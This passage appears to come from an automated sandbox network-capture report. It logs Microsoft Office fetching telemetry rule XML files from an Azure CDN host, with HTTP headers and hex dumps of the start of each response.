                                                                                        2024-12-05 21:51:06 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        138192.168.2.54994813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:05 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1427
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                        x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215106Z-1746fd949bdfg4slhC1EWR34t00000000380000000002c04
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        139192.168.2.54994913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:06 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1390
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                        ETag: "0x8DC582BE3002601"
                                                                                        x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215106Z-1746fd949bd54zxghC1EWRzre400000003n0000000005t21
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        140192.168.2.54995013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:06 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:07 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:07 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                        x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215107Z-1746fd949bd7wvgbhC1EWR0rgs00000003b000000000ey8g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:07 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        141192.168.2.54995413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:08 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                        x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bd2cq7chC1EWRnx9g00000002v000000000umf1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        142192.168.2.54995113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:08 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                        x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bddtfvqhC1EWRxbpg0000000330000000012903
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        143192.168.2.54995213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:08 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1391
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                        x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bd4w8sthC1EWR700400000002zg00000000rh7p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        144192.168.2.54995313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:08 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1354
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                        x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bdl6zq5hC1EWRf3ws00000002w000000000v8dn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        145192.168.2.54995513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:09 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:09 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:09 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                        x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215109Z-1746fd949bdxk6n6hC1EWRdr8c000000032g00000000q0g6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        146192.168.2.54995613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:10 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1399
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                        x-ms-request-id: 4885a0d8-201e-0096-65c7-45ace6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bd6zq92hC1EWRry48000000035000000000wh7t
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        147192.168.2.54995713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:10 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC495INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1362
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF497570"
                                                                                        x-ms-request-id: d9cb4e45-b01e-0084-305f-47d736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bd5gpk5hC1EWR8dk400000000t00000000057qq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        148192.168.2.54995813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:10 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
